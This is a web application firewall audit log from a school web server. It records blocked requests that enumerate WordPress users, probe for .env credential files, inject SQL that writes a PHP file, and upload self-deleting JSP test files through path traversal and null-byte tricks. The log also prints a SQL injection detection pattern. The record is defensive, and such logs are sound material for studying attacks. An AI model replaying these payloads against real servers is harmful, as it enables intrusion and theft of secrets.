Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c59497c-Z-- --3986f541-A-- [22/May/2025:15:35:25 +0700] aC7hzSektx75wRFPQyj53wAAAMY 103.236.140.4 44698 103.236.140.4 8181 --3986f541-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 176.88.166.177 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 176.88.166.177 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3986f541-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3986f541-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747902925219980 2441 (- - -) Stopwatch2: 1747902925219980 2441; combined=1240, p1=414, p2=798, p3=0, p4=0, p5=28, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3986f541-Z-- --f6a1a735-A-- [22/May/2025:15:38:01 +0700] aC7iaWfriXjg62qQwE9imwAAAII 103.236.140.4 44808 103.236.140.4 8181 --f6a1a735-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0 Accept-Charset: utf-8 --f6a1a735-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6a1a735-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747903081649528 766 (- - -) Stopwatch2: 1747903081649528 766; combined=320, p1=285, p2=0, p3=0, p4=0, p5=35, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6a1a735-Z-- --d07fe209-A-- [22/May/2025:15:38:48 +0700] aC7imH0O04WKE1HJ5iRyogAAAAA 103.236.140.4 44834 103.236.140.4 8181 --d07fe209-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; VOG-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --d07fe209-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d07fe209-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747903128507774 860 (- - -) Stopwatch2: 1747903128507774 860; combined=346, p1=304, p2=0, p3=0, p4=0, p5=42, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d07fe209-Z-- --1a8ff845-A-- [22/May/2025:15:50:23 +0700] aC7lT-ThJmFSRJ5-OZfUhgAAAEs 103.236.140.4 45742 103.236.140.4 8181 --1a8ff845-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.216.50.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.216.50.20 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1a8ff845-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a8ff845-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747903823475800 16370 (- - -) Stopwatch2: 1747903823475800 16370; combined=28558, p1=452, p2=782, p3=0, p4=0, p5=13676, sr=83, sw=0, l=0, gc=13648 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a8ff845-Z-- --b30e181e-A-- [22/May/2025:16:41:01 +0700] aC7xLeThJmFSRJ5-OZfWfgAAAEk 103.236.140.4 47366 103.236.140.4 8181 --b30e181e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.232.112.86 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.232.112.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b30e181e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b30e181e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747906861387783 3157 (- - -) Stopwatch2: 1747906861387783 3157; combined=1415, p1=486, p2=897, p3=0, p4=0, p5=32, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b30e181e-Z-- --532a7777-A-- [22/May/2025:16:48:26 +0700] aC7y6iektx75wRFPQyj7SgAAAME 103.236.140.4 49110 103.236.140.4 8181 --532a7777-B-- POST /mp/login/../uploadControl/uploadFile HTTP/1.0 Host: 218.95.66.214 X-Real-IP: 45.32.66.146 X-Forwarded-Host: 218.95.66.214 X-Forwarded-Server: 218.95.66.214 X-Forwarded-For: 45.32.66.146 X-Forwarded-Proto: https Connection: close Content-Length: 303 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoDIsCqVMmF83ptmp --532a7777-C-- ------WebKitFormBoundaryoDIsCqVMmF83ptmp Content-Disposition: form-data; name="file"; filename="test.jsp" Content-Type: application/octet-stream clyvxpyjtc ------WebKitFormBoundaryoDIsCqVMmF83ptmp Content-Disposition: form-data; name="submit" 上传 ------WebKitFormBoundaryoDIsCqVMmF83ptmp --532a7777-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --532a7777-H-- Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||218.95.66.214|F|2"] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747907306936633 2925 (- - -) Stopwatch2: 1747907306936633 2925; combined=1997, p1=340, p2=1584, p3=20, p4=26, p5=27, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --532a7777-Z-- --3d5e336a-A-- [22/May/2025:16:48:27 +0700] aC7y6-ThJmFSRJ5-OZfXzAAAAFE 103.236.140.4 49122 103.236.140.4 8181 --3d5e336a-B-- POST /manager/teletext/material/rewrite.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 148 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0 ------WebKitFormBoundaryOKldnDPT: close Content-Disposition: form-data; name="tmp_name"; filename="test.php" Content-Type: image/png X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 165938553 --3d5e336a-C-- ------WebKitFormBoundaryOKldnDPT Content-Disposition: form-data; name="uploadtime" ------WebKitFormBoundaryOKldnDPT-- --3d5e336a-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d5e336a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=image/png"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747907307925691 3646 (- - -) Stopwatch2: 1747907307925691 3646; combined=2495, p1=431, p2=1967, p3=32, p4=35, p5=29, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d5e336a-Z-- --01a6326b-A-- [22/May/2025:16:48:30 +0700] aC7y7uThJmFSRJ5-OZfXzQAAAFU 103.236.140.4 49162 103.236.140.4 8181 --01a6326b-B-- GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.0 Host: 222.77.136.93 Cookie: CookieLanguageName=ZH-CN; CookieAuthType=0 X-Real-IP: 45.32.66.146 X-Forwarded-Host: 222.77.136.93 X-Forwarded-Server: 222.77.136.93 X-Forwarded-For: 45.32.66.146 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.58 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: zh-CN,zh;q=0.9 Upgrade-Insecure-Requests: 1 --01a6326b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --01a6326b-E-- --01a6326b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||222.77.136.93|F|2"] [data "Matched Data: 3');select unhex('3c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b') into outfile '.\x5c\x5c..\x5c\x5c..\x5c\x5cWebRoot\x5c\x5cplom.xgi' found within MATCHED_VAR: 3');select unhex('3c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b') into outfile '.\x5c\x5c..\x5c\x5c..\x5c\x5cWebRoot\x5c\x5cplom.xgi'"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747907310927903 5672 (- - -) Stopwatch2: 1747907310927903 5672; combined=3795, p1=549, p2=3185, p3=0, p4=0, p5=61, sr=128, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01a6326b-Z-- --0b360010-A-- [22/May/2025:16:48:30 +0700] aC7y7mfriXjg62qQwE9jmgAAAIQ 103.236.140.4 49176 103.236.140.4 8181 --0b360010-B-- POST /portal/pt/servlet/saveXmlToFileServlet/doPost?pageId=login&filename=wahaaqzbta.jsp%00 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 27 User-Agent: Apache-HttpClient/5.2.1 (Java/1.8.0_202) Accept: */* Accept-Language: en Content-Encoding: UTF_8 Content-Type: application/octet-stream serverEnable: localserver X-Forwarded-For: 45.32.66.146 Cookie: LA_K1=langid X-Varnish: 168122827 --0b360010-C-- 2xQufet7slhcePnWnsiM5YP4rrJ --0b360010-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b360010-E-- --0b360010-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:filename outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:filename=wahaaqzbta.jsp\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747907310929711 4252 (- - -) Stopwatch2: 1747907310929711 4252; combined=2410, p1=562, p2=1809, p3=0, p4=0, p5=39, sr=88, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b360010-Z-- --c93f8471-A-- [22/May/2025:16:48:30 +0700] aC7y7iektx75wRFPQyj7UQAAANI 103.236.140.4 49184 103.236.140.4 8181 --c93f8471-B-- POST /portal/pt/servlet/saveImageServlet/doPost?pageId=login&filename=../rnybpglt.jsp%00 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 10 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Content-Type: application/octet-stream X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 165938556 --c93f8471-C-- file error --c93f8471-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c93f8471-E-- --c93f8471-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:filename outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:filename=../rnybpglt.jsp\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747907310930969 3533 (- - -) Stopwatch2: 1747907310930969 3533; combined=1968, p1=587, p2=1344, p3=0, p4=0, p5=37, sr=93, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c93f8471-Z-- --8cbd8e01-A-- [22/May/2025:16:48:30 +0700] aC7y7iektx75wRFPQyj7UwAAAMI 103.236.140.4 49190 103.236.140.4 8181 --8cbd8e01-B-- POST /uapws/saveDoc.ajax?ws=/../../fyw6z.jspx%00 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 314 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 166593722 --8cbd8e01-C-- content= out.println("vsilhmpzse");new java.io.File(application.getRealPath(request.getServletPath())).delete(); --8cbd8e01-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8cbd8e01-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:ws outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:ws=/../../fyw6z.jspx\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747907310933754 3408 (- - -) Stopwatch2: 1747907310933754 3408; combined=2243, p1=435, p2=1780, p3=0, p4=0, p5=27, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8cbd8e01-Z-- --0ce9c80f-A-- [22/May/2025:16:51:13 +0700] aC7zkWfriXjg62qQwE9jpQAAAIM 103.236.140.4 49278 103.236.140.4 8181 --0ce9c80f-B-- POST /UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&foldername=%2e%2e%2f&filename=mluhmcfe.jsp&filename=1.jpg HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 250 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: zh-CN,zh;q=0.9 Content-Type: multipart/form-data Upgrade-Insecure-Requests: 1 X-Forwarded-For: 45.32.66.146, 103.236.140.4 Cookie: X-Varnish: 168122836 --0ce9c80f-C-- ------WebKitFormBoundary92pUawKc Content-Disposition: form-data; name="myFile";filename="test.jpg" <% out.println("fooiqjzoyn");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %> ------WebKitFormBoundary92pUawKc-- --0ce9c80f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ce9c80f-H-- Message: Multipart parsing error (init): Multipart: Boundary not found in C-T. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Multipart: Boundary not found in C-T."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Message: Access denied with code 403 (phase 2). Match of "eq 0" against "MULTIPART_STRICT_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "30"] [id "210240"] [rev "4"] [msg "COMODO WAF: Multipart request body failed strict validation: PE 1, BQ 0, BW 0, DB 0, DA 0, HF 0, LF 0, SM , IQ 0, IH 0, FLE 0||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747907473939153 5872 (- - -) Stopwatch2: 1747907473939153 5872; combined=4738, p1=433, p2=4273, p3=0, p4=0, p5=32, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ce9c80f-Z-- --d35b9a49-A-- [22/May/2025:17:06:31 +0700] aC73J30O04WKE1HJ5iR0EwAAAAc 103.236.140.4 49796 103.236.140.4 8181 --d35b9a49-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.25 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --d35b9a49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d35b9a49-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747908391828816 879 (- - -) Stopwatch2: 1747908391828816 879; combined=354, p1=310, p2=0, p3=0, p4=0, p5=43, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d35b9a49-Z-- --9ca49644-A-- [22/May/2025:17:12:36 +0700] aC74lOThJmFSRJ5-OZfYMgAAAFI 103.236.140.4 50016 103.236.140.4 8181 --9ca49644-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.159.51.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.159.51.214 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9ca49644-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ca49644-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747908756655458 3055 (- - -) Stopwatch2: 1747908756655458 3055; combined=1333, p1=458, p2=841, p3=0, p4=0, p5=33, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ca49644-Z-- --0f7f706f-A-- [22/May/2025:17:15:14 +0700] aC75MuThJmFSRJ5-OZfYPQAAAFQ 103.236.140.4 50112 103.236.140.4 8181 --0f7f706f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.140 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G935F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --0f7f706f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f7f706f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747908914030236 675 (- - -) Stopwatch2: 1747908914030236 675; combined=296, p1=265, p2=0, p3=0, p4=0, p5=31, sr=68, sw=0, l=0, gc=0 Producer: 